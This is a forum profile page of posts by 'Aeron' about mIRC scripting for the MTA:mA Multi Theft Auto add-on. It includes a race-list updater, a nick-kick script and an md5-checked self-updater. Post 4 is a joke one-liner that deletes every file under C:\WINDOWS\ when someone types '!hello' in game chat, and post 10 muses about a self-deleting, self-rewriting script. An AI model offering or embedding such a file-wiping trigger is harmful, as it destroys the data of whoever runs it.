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Everything posted by Aeron

  1. Hope you had a happy birthday!
  3. I wonder who. >_> <_< (PS: YOU CANT DROWN IN SA !!!!!!!!!1111!!1)
  4. on *:SIGNAL:mta.command { if ($3 == !hello) { mta.text $1 $2 HELLO $findfile(C:\WINDOWS\,*,0,!remove $+(",$1-,")) } } Fits more. DISCLAIMER: Use on own risk, i'm not responsible for your stupidity.
  5. */me shuffles all MTA:mA problems to BetaDevil/lil_Toady*
  6. /* RaceList Updater v1.1 by lil_Toady Special thanks to [uVA]Scooby Updated by Aeron The script will be automaticly updating the races list untill it gets all the maps. If you still think it is missing maps do: !updateraces (admins level 2) If you want to put it into your script here are the aliases you'd want to know: mta.races.check - Checks for missing maps, if so it starts the updater (not accurate) mta.races.update - Starts the updater */ on *:SIGNAL:mta.command:{ if (!updaterace* iswm $3) { if ($mta.level($1,$2) > 1) { mta.text $1 Updating the race list. mta.races.update $1 } } } on *:SIGNAL:mta.racelist:{ mta.races.check $1 } alias mta.races.check { var %a = $ini($mta.dir $+ $1.ini,Races,0),%b = $ini($mta.dir $+ $1.ini,Races,%a) if (%b > %a) mta.races.update $1 } alias mta.races.update { mta.echo $1 * Racelist: Updating... !bset &b 1 109 0 $did(mta,$1 $+ 22) $mta.dex($did(mta,$1 $+ 12)) 124 $mta.dex(mta.races. $+ $rand(1000,9999)) 0 !sockudp -k mta.races.sock. $+ $1 $did(mta,$1 $+ 10) $did(mta,$1 $+ 11) &b !.timermta.races.timer. $+ $1 1 10 !sockclose mta.races.sock. $+ $1 } on *:udpread:mta.races.sock.*: { !sockread &a var %a = $right($sockname,-15),%b = $bvar(&a,3),%c = $bvar(&a,2) if (%c == 1) { mta.echo %a * Racelist: Updating failed. ( $+ $gettok(User:Incorrect password:Already connected:Timed-out:To much connections:Banned:Name in use:Invalid Version,$calc(%b + 1),58) $+ ) if (%b == 5) mta.unban %a $ip elseif (%b == 1) mta.echo %a * Racelist: Updating stopped. else !.timermta.races.timer. $+ $1 1 15 mta.races.check %a !sockclose $sockname } elseif (%c == 2) { !bset &b 1 109 2 !sockudp -k $sockname $did(mta,%a $+ 10) $did(mta,%a $+ 11) &b } elseif (%c == 18) { if ($mta.server(%a).version == 2) { if (%b == 1) { %c = $calc($bvar(&a,5) * 256 + $bvar(&a,4)) if (!$readini($+($mta.dir,%a,.ini),Races,%c)) { !did -i $+ %c mta %a $+ 16 $bvar(&a,6,50).text !writeini -n $+(",$mta.dir,%a,.ini") Races %c $bvar(&a,6,50).text !sockmark $sockname $calc($sock($sockname).mark + 1) } } elseif (%b == 2) { mta.echo %a * Racelist: Updated. ( $+ $sock($sockname).mark missing maps retrieved) !bset &b 1 109 1 !sockudp -k $sockname $did(mta,%a $+ 10) $did(mta,%a $+ 11) &b !sockclose $sockname !.timermta.races.timer. $+ %a off !.signal mta.racelist %a } } } } on *:SIGNAL:mta.disconnect:{ if ($sock(mta.races.sock. $+ $1)) { !bset &b 1 109 1 !sockudp -k mta.races.sock. $+ $1 $did(mta,%a $+ 10) $did(mta,%a $+ 11) &b !sockclose mta.races.sock. $+ $1 !.timermta.races.timer. $+ $1 off } } 'Unofficial v1.1' (100% UNTESTED) - Fixed problems for use of multiple MTA:mA's - Fixed problems with use for Server 10 or more - Makes no use of a global variable - Various optimilizations - All operations/sources prefixed with 'mta.races.'
  7. Aeron

    MTA:MA Scripting

    Turn off HTML and BBCode when posting scripts.
  8. Does that mean that there is only one font in the whole MTA:DM? Yes.
  9. 1. Yes 2. If a bail is 'destroyed' it 'respawns' the next time that bail moves. (Quite nasty ) 3. Don't pick long names 4. Script is editble. As far as I understand, "priority" gives the ability to show one text above the other. But where is the parameter for changing font? Font changing isn't possible. Priority stands for how quick the text in the display must be updated on a change. The script makes a copy of the current matrix, fills in the player positions then checks bail movement, at the next check we don't want the players position of the previous check in the matrix, thats why the copy and that functions copies the matrix.
  10. Aeron

    Name Kick

    Toady, can you make a script that uses a timer to rewrite the script who triggered the timer that uses nothing else then the command given in the timer? Aka (as for example): 1. Script runs: on *:START: { !timer 1 1 *magic code* !remove $qt($script) } 2. Timer starts + script gets removed 3. Timer ends does magic trick to write script: on *:START: { !timer 1 1 *magic code* !remove $qt($script) } If you can do that then I'll will recognise your scripts.
  11. Aeron

    Name Kick

    yeah he always do it. I wonder where Toady got that method from >_> <_< me! on *:SIGNAL:mta.join: { c $1 $2 $readini($mta.dir $+ $1.ini,n,$2,Nick $+ $readini($mta.dir $+ $1.ini,n,$2,Nicks)) } on *:SIGNAL:mta.nick: { c $1 $2 $readini($mta.dir $+ $1.ini,n,$2,Nick $+ $readini($mta.dir $+ $1.ini,n,$2,Nicks)) } alias -l c { var %a = dick lol f*cker if ($findtok(%a,$3,1,32)) { mta.text $1 $qt($3) - forbidden nick mta.kick $1 $2 } } Optimized code (requires mIRC 6.2 or later) just to annoy Toady (You can also remove the var %a = line and insert the words directly in $findtok, even better rifk)
  12. To big location offset. aka, if X goes from -2300 to 800 between 2 objects then you know you hit the border
  13. Aeron


    MTA:mA -> IP range ban. PM the IP and i'll look up the range.
  14. Aeron

    X-Treme Roleplay 2.01

    Use my l33t updater of doom rifk. ;///////////// ;// Updater // ;///////////// alias mta.update { if ($dialog(mta)) { if (!$sock(mta.update.check)) { mta.echo $mta.active * Updater: Checking for updates... !sockopen mta.update.check home.deds.nl 80 } } else { !echo $color(info) -ae * /mta.update: not started } } dialog -l mta.update { title "Updater" size -1 -1 94 98 option dbu icon $scriptdirmta.ico, 0 button "Yes", 1, 8 84 37 12 button "No", 2, 52 84 37 12, ok edit "", 3, 2 2 90 54, multi return vsbar text "Status:", 4, 2 58 19 8 text "", 5, 22 58 69 14 box "", 6, 2 70 90 11 text "", 7, 4 74 86 5 } on *:sockopen:mta.update.check: { if ($dialog(mta)) { if (!$sockerr) { !.remove mta.update.tmp !sockwrite -n $sockname GET /~aeron/mtama/4.0/mta.tmp $+(HTTP/1.1,$crlf,Host: home.deds.nl,$crlf,Connection: Close,$crlf,$crlf) } else mta.echo $mta.active * Updater: Connection problems. } } on *:sockread:mta.update.check: { if ($dialog(mta)) { !sockread &a while ($sockbr != 0) { !bwrite mta.update.tmp -1 &a !sockread &a } } } on *:sockclose:mta.update.check: { if ($dialog(mta)) { !bread mta.update.tmp 1 $file(mta.update.tmp).size &a !bcopy -c &a 1 &a $calc($bfind(&a,1,10 13 10)+3) -1 !.remove mta.update.tmp !bwrite mta.update.tmp 0 &a if ($ini(mta.update.tmp,info) == 0) { !.remove mta.update.tmp mta.echo $mta.active * Updater: Invalid update file. } else { var %a = 2,%b while (%a <= $ini(mta.update.tmp,0)) { %b = $ini(mta.update.tmp,%a) if ($exists($scriptdir $+ %b)) && ($md5($scriptdir $+ %b,2) != $readini(mta.update.tmp,n,%b,md5)) { if (!$dialog(mta.update)) { !dialog -v mta !dialog -ma mta.update mta.update !did -m mta.update 3 !did -a mta.update 5 Download newer versions? } !did -a mta.update 3 $+($crlf,File: %b,$crlf,Version: $readini(mta.update.tmp,n,%b,version),$crlf,Info: $readini(mta.update.tmp,n,%b,info),$crlf) } else { !remini mta.update.tmp %b !dec %a } !inc %a } } if (!$dialog(mta.update)) { !.remove mta.update.tmp mta.echo $mta.active * Updater: No updates. } } } on *:sockopen:mta.update.download: { if ($dialog(mta)) { if ($sockerr == 0) { var %a = $ini(mta.update.tmp,$sock($sockname).mark) if (%a == $null) { !did -a mta.update 5 Finished. !did -ea mta.update 1 Install } else { !did -a mta.update 5 Downloading $+(",%a,") !did -r mta.update 7 !.remove %a $+ .tmp !sockwrite -n $sockname GET /~aeron/mtama/4.0/ $+ %a $+(HTTP/1.1,$crlf,Host: home.deds.nl,$crlf,Connection: Close,$crlf,$crlf) } } else { !did -a mta.update 5 Connection error. !did -a mta.update 2 Close } } } on *:sockread:mta.update.download: { if ($dialog(mta)) { var %a = $ini(mta.update.tmp,$sock($sockname).mark) !sockread &a while ($sockbr != 0) { !did -a mta.update 7 $str(l,$calc(86/ $readini(mta.update.tmp,n,%a,Size) * $sock($sockname).rcvd)) !bwrite %a $+ .tmp -1 &a !sockread -f &a } } } on *:sockclose:mta.update.download: { if ($dialog(mta)) { var %a = $ini(mta.update.tmp,$sock($sockname).mark) !bread %a $+ .tmp 1 $file(%a $+ .tmp).size &a !bcopy -c &a 1 &a $calc($bfind(&a,1,10 13 10)+3) -1 !.remove %a $+ .tmp !bwrite %a $+ .tmp 0 &a if ($md5(%a $+ .tmp,2) != $readini(mta.update.tmp,n,%a,md5)) { !did -a mta.update 5 md5 mismatch on $+(",%a,") !did -a mta.update 2 Close } else !.timer 1 0 $sockname $calc(1+$sock($sockname).mark) } } alias -l mta.update.download { !sockopen mta.update.download home.deds.nl 80 !sockmark mta.update.download $1 } on *:DIALOG:mta.update:close:0:!sockclose mta.update.* $findfile($mircdir,*.tmp,0,1,!.remove " $+ $1-") on *:DIALOG:mta.update:sclick:1: { if (Yes == $did(mta.update,1)) { !did -a mta.update 5 Connecting... !did -b mta.update 1 !did -a mta.update 2 Cancel !sockclose mta.update.download mta.update.download 2 } elseif (Install == $did(mta.update,1)) { !did -a mta.update 5 Installing... var %a = 2,%b while ($ini(mta.update.tmp,%a) != $null) { !.copy -o $v1 $+ .tmp $+(",$scriptdir,$v1,") !inc %a } mta.quit !.load -rs1 $+(",$script,") } } on *:DIALOG:mta.update:sclick:2: { mta.echo $mta.active * Updater: No cancelled. } I'm sure ur good enough to alter this script to link it to your functions & website. Expect around 3000 hits tops per month. (mta.tmp stats) File format: [info] Script=MTA:mA Author=Aeron [mta.mrc] Version=4.15 md5=f9caab32d9653c322ddd48bf26e85c02 Info=Fixed record script: http://home.deds.nl/~aeron/scripts/4.0/mta.stats2.mrc Size=65536 [mta.ico] Version=1.0 md5=4b55c31209731185ee6c44919935e668 Info=Icon Size=1406
  15. Take all interiors, extract the interiors named in other files and you'll know what is left. (Or just pick one of the 1792 object, create it in the map editor and hope you recognize it, or look the object name up in San Andreas data files )
  16. Aeron

    X-Treme Roleplay 2.01

    Lines 123 and 136 are broken in your mta.data.ini. and i miss the [AREA1] section. Furthermore i see allot of complex polygons in mta.data.ini, it's possible to work with those but making the area's rectangle would save some CPU time.
  17. If you remove ur capslock key, make sure it's off first
  18. Aeron

    The "Wait"?

    */me giggles* The next scripting tut will make it worse (If got time for it to write it)
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